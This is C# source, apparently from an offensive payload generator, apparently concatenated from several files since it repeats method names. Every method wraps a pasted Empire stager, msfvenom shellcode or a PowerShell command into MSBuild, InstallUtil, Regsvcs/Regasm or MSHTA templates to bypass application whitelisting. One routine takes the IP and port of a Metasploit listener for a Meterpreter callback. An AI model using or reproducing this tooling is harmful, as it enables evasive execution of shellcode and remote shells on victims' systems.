private static void Empire()
{
/* Default filename */
string Filename_InstallUtilPowerShellB64_Default = "InstallUtilPowerShellB64.exe";
Helpers.WriteEmpireExample();
string InstallUtil_Payload = Helpers.PasteToString();
/* Decode */
string decoded = Encoding.Unicode.GetString(System.Convert.FromBase64String(InstallUtil_Payload));
/* Replace & with . due to a bug of somekind */
string replaced = decoded.Replace("&", ".");
/* ENCODE */
string base64string = Convert.ToBase64String(Encoding.UTF8.GetBytes(replaced));
InstallUtil_Payload = base64string;
string Outfile = Helpers.FileFolderLocation(Filename_InstallUtilPowerShellB64_Default);
Generators.GeneratePayload(Resources.Template_InstallUtil_PowerShell, Outfile, InstallUtil_Payload, "Compile", "/unsafe /platform:x86", null, null);
Console.WriteLine();
Console.WriteLine("Commands used to execute payload:");
Helpers.WriteInstallUtilPayloadExample(Outfile);
Helpers.PauseExecution();
}
private static void Empire()
{
/* Default filename */
string Filename_MsbuildEmpireStager_Default = "MSBuildEmpireStager.bypass";
Helpers.WriteEmpireExample();
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Important! -->Only paste the base64 encoded string<--");
Console.ResetColor();
Console.WriteLine("Press Enter in an empty line to exit paste");
string Empire_Stager = Helpers.PasteToString();
/* Decode */
string decoded = Encoding.Unicode.GetString(System.Convert.FromBase64String(Empire_Stager));
/* Replace & with . due to a bug of somekind */
string replaced = decoded.Replace("&", ".");
Console.WriteLine();
/* ENCODE */
string base64string = Convert.ToBase64String(Encoding.UTF8.GetBytes(replaced));
Console.WriteLine(base64string);
Console.WriteLine();
Empire_Stager = base64string;
string Outfile = Helpers.FileFolderLocation(Filename_MsbuildEmpireStager_Default);
Generators.GeneratePayload(Resources.Template_MSBuild_PowerShell, Outfile, Empire_Stager, "GenerateFile", null, null, null);
Helpers.WriteMSBuildPayloadExample(Outfile);
Helpers.PauseExecution();
}
private static void MSBuildShell()
{
/* Default filename */
string Filename_MSBuildShell_Default = "MSBuildShell.bypass";
string Outfile = Helpers.FileFolderLocation(Filename_MSBuildShell_Default);
Generators.GeneratePayload(Resources.Template_MSBuild_MSBuildShell, Outfile, null, "GenerateFile", null, null, null);
Helpers.WriteMSBuildPayloadExample(Outfile);
Helpers.PauseExecution();
}
private static void EmpireStarFighter()
{
/* Default filename */
string Filename_MSHTAStarFighter_Default = "MSHTA_StarFighter.bypass";
Helpers.WriteEmpireExample();
string Empire_Stager = Helpers.PasteToString();
string Outfile = Helpers.FileFolderLocation(Filename_MSHTAStarFighter_Default);
Generators.GeneratePayload(Resources.Template_MSHTA_StarFighter, Outfile, Empire_Stager, "GenerateFile", null, null, null);
Helpers.WriteMSHTAPayloadExample(Outfile);
Helpers.PauseExecution();
}
private static void MetasploitVBSMeter()
{
/* Default filename */
string Filename_MSHTAVBSMeter_Default = "MSHTA_VBSMeter.bypass";
Helpers.WriteVBSMeterExample();
Console.WriteLine("Enter RHOST (IP to Metasploit server where listener is running):");
string RHOST = Console.ReadLine();
Console.WriteLine("Enter RPORT (Port to Metasploit server where listener is running):");
string RPORT = Console.ReadLine();
string Outfile = Helpers.FileFolderLocation(Filename_MSHTAVBSMeter_Default);
Generators.GeneratePayload(Resources.Template_MSHTA_VBSMeter, Outfile, null, "GenerateFile", null, RHOST, RPORT);
Helpers.WriteMSHTAPayloadExample(Outfile);
Helpers.PauseExecution();
}
private static void Metasploit()
{
// Default filename
string Filename_MsbuildMetasploitPayload_Default = "MSBuildMetasploitPayload.bypass";
Helpers.WriteMetasploitExample();
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Important! --Paste entire output from msfvenom, including byte[] buf and so on--");
Console.ResetColor();
Console.WriteLine("Press Enter in an empty line to exit...");
string Metasploit_Payload = Helpers.PasteToString();
string Outfile = Helpers.FileFolderLocation(Filename_MsbuildMetasploitPayload_Default);
Generators.GeneratePayload(Resources.Template_MSBuild_Shellcode, Outfile, Metasploit_Payload, "GenerateFile", null, null, null);
Helpers.WriteMSBuildPayloadExample(Outfile);
Helpers.PauseExecution();
}
private static void MetaSploit()
{
/* Default filename */
string Filename_RegsvcsRegasmMetasploitPayloadDLL_Default = "RegsvcsRegasmMetasploitPayload.dll";
Helpers.WriteMetasploitExample();
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Important! --Paste entire output from msfvenom, including byte[] buf and so on--");
Console.ResetColor();
Console.WriteLine("Press Enter in an empty line to exit...");
string Metasploit_Payload = Helpers.PasteToString();
string Outfile = Helpers.FileFolderLocation(Filename_RegsvcsRegasmMetasploitPayloadDLL_Default);
//Generators.GeneratePayload(Resources.Template_RegsvcsRegasm_Shellcode, Outfile, Metasploit_Payload, "Compile", "/keyfile:meta.snk /unsafe /platform:x86", null, null);
// Seems to work without keyfile...
Generators.GeneratePayload(Resources.Template_RegsvcsRegasm_Shellcode, Outfile, Metasploit_Payload, "Compile", "/unsafe /platform:x86", null, null);
Helpers.WriteRegsvcsRegasmPayloadExample(Outfile);
Helpers.PauseExecution();
}
private static void MetaSploit()
{
/* Default filename */
string Filename_InstallUtilMetasploit_Default = "InstallUtilMetasploit.exe";
Helpers.WriteMetasploitExample();
Console.WriteLine("Paste in your Metasploit C# payload here");
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Important! --Paste entire output from msfvenom, including byte[] buf and so on--");
Console.ResetColor();
Console.WriteLine("Press Enter in an empty line to exit...");
string InstallUtil_Payload = Helpers.PasteToString();
string Outfile = Helpers.FileFolderLocation(Filename_InstallUtilMetasploit_Default);
Generators.GeneratePayload(Resources.Template_InstallUtil_Shellcode, Outfile, InstallUtil_Payload, "Compile", "/unsafe /platform:x86", null, null);
Console.WriteLine();
Console.WriteLine("Commands used to execute payload:");
Helpers.WriteInstallUtilPayloadExample(Outfile);
Helpers.PauseExecution();
}
private static void UnencodedPoshCommand()
{
string Filename_MsbuildUnencodedPowerShell_Default = "MSBuildUnencodedPowerShell.bypass";
Console.WriteLine("Type in your unencoded PowerShell command");
Console.WriteLine("");
Console.WriteLine("Example: Get-service > c:\\test\\file.csv");
Console.WriteLine("");
Console.WriteLine("Press Enter in an empty line to exit paste");
string Unencoded_PowerShell = Helpers.PasteToString();
var plainTextBytes = System.Text.Encoding.UTF8.GetBytes(Unencoded_PowerShell);
Unencoded_PowerShell = System.Convert.ToBase64String(plainTextBytes);
string Outfile = Helpers.FileFolderLocation(Filename_MsbuildUnencodedPowerShell_Default);
Generators.GeneratePayload(Resources.Template_MSBuild_PowerShell, Outfile, Unencoded_PowerShell, "GenerateFile", null, null, null);
Helpers.WriteMSBuildPayloadExample(Outfile);
Helpers.PauseExecution();
}
private static void Empire()
{
string Filename_RegsvcsRegasmEmpireStagerDLL_Default = "RegsvcsRegasmEmpireStager.dll";
Helpers.WriteEmpireExample();
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Important! -->Only paste the base64 encoded string<--");
Console.ResetColor();
Console.WriteLine("Press Enter in an empty line to exit paste");
string Empire_Stager = Helpers.PasteToString();
/* Decode */
string decoded = Encoding.Unicode.GetString(System.Convert.FromBase64String(Empire_Stager));
Console.WriteLine(decoded);
/* Replace & with . due to a bug of somekind */
string replaced = decoded.Replace("&", ".");
Console.WriteLine();
/* ENCODE */
string base64string = Convert.ToBase64String(Encoding.UTF8.GetBytes(replaced));
Console.WriteLine();
Empire_Stager = base64string;
string Outfile = Helpers.FileFolderLocation(Filename_RegsvcsRegasmEmpireStagerDLL_Default);
//Generators.GeneratePayload(Resources.Template_RegsvcsRegasm_PowerShell, Outfile, Empire_Stager, "Compile", "/r:C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll /unsafe /platform:x86", null, null);
//Generators.GeneratePayload(Resources.Template_RegsvcsRegasm_PowerShell, Outfile, Empire_Stager, "Compile", "/keyfile:meta.snk /unsafe /platform:x86", null, null);
// meta.snk hardcoded in template - file needs to be in dir where alby is run
Generators.GeneratePayload(Resources.Template_RegsvcsRegasm_PowerShell, Outfile, Empire_Stager, "Compile", "/unsafe /platform:x86", null, null);
Helpers.WriteRegsvcsRegasmPayloadExample(Outfile);
Helpers.PauseExecution();
}
